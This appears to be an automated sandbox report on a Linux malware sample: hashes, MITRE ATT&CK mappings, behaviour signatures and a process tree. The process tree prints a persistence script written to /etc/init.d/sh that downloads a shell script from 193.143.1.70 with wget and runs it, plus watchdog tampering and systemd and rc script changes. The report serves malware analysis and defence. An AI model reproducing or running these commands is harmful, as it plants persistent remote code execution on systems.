Analysis
-
max time kernel
148s -
max time network
131s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
25-11-2024 09:17
Static task
static1
Behavioral task
behavioral1
Sample
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90
-
Size
100KB
-
MD5
bc4f7b6b809716973dc96fb6a79f93ea
-
SHA1
6b657f8958d7bf6f5e4a074252aaa24fcbca4e0c
-
SHA256
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90
-
SHA512
de632b38e37ea1148446a54d771145fef83867f47e6f9c6da0f8e634ccb9d2374c43ea5b611889f8aed93da6e09b0cf4a91a477619ca904bccbf575655c55622
-
SSDEEP
3072:btjVQMkmWGs5W3gGdpmO1DHXcEm0lxXF2w7QkH:bdVQMk6sor1Dc0TX0h
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
shshchmodshchmodpid process 1656 sh 1658 sh 1659 chmod 1644 sh 1649 chmod -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90description ioc process File opened for modification /dev/watchdog 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 File opened for modification /dev/misc/watchdog 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 -
Checks mountinfo of local process 1 TTPs 1 IoCs
Checks mountinfo of running processes which indicate if it is running in chroot jail.
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90description ioc process File opened for reading /proc/1669/mountinfo 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90description ioc process File opened for modification /etc/profile 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 -
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90shdescription ioc process File opened for modification /etc/init.d/system 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 File opened for modification /etc/init.d/sh sh -
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90description ioc process File opened for modification /etc/rc.local 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90description ioc process File opened for modification /etc/systemd/system/custom.service 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 -
Modifies Bash startup script 2 TTPs 1 IoCs
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90description ioc process File opened for modification /etc/profile 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 -
Changes its process name 1 IoCs
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90description pid process Changes the process name, possibly in an attempt to hide itself 1587 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 -
Processes:
0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90systemctlmkdirdescription ioc process File opened for reading /proc/self/status 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 File opened for reading /proc/1/cgroup 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 File opened for reading /proc/filesystems systemctl File opened for reading /proc/filesystems mkdir File opened for reading /proc/1674/status 0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90
Processes
-
/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e901⤵
- Modifies Watchdog functionality
- Checks mountinfo of local process
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads runtime system information
PID:1587 -
/bin/shsh -c "systemctl enable custom.service >/dev/null 2>&1"2⤵PID:1590
-
/usr/bin/systemctlsystemctl enable custom.service3⤵
- Reads runtime system information
PID:1591
-
-
-
/bin/shsh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
PID:1644 -
/usr/bin/chmodchmod +x /etc/init.d/system3⤵
- File and Directory Permissions Modification
PID:1649
-
-
-
/bin/shsh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"2⤵PID:1652
-
/usr/bin/lnln -s /etc/init.d/system /etc/rcS.d/S99system3⤵PID:1653
-
-
-
/bin/shsh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"2⤵
- File and Directory Permissions Modification
- Modifies init.d
PID:1656
-
-
/bin/shsh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
PID:1658 -
/usr/bin/chmodchmod +x /etc/init.d/sh3⤵
- File and Directory Permissions Modification
PID:1659
-
-
-
/bin/shsh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"2⤵PID:1660
-
/usr/bin/mkdirmkdir -p /etc/rc.d3⤵
- Reads runtime system information
PID:1663
-
-
-
/bin/shsh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"2⤵PID:1666
-
/usr/bin/lnln -s /etc/init.d/sh /etc/rc.d/S99sh3⤵PID:1667
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
109B
MD5735cae7d3cbab0f59d95f84790282103
SHA11cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe
-
Filesize
353B
MD5c5583b6a699f62cb0a004c99842f5c70
SHA1b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA2562b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d
-
Filesize
96B
MD5f000251d92c773cc3ee1ca22cf5f0788
SHA1e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA25631a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA5120dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2
-
Filesize
101B
MD53d6b6e1b05ad5d0538ccd8804bcd279b
SHA10fc061b51c225d5bea072c939de05e8a856558bc
SHA256cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA5121957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98
-
Filesize
53B
MD52bd9b4be30579e633fc0191aa93df486
SHA17d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA25664dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5
-
Filesize
290B
MD519a440fdac7f578f2fb33719698a082c
SHA1ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA5128bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb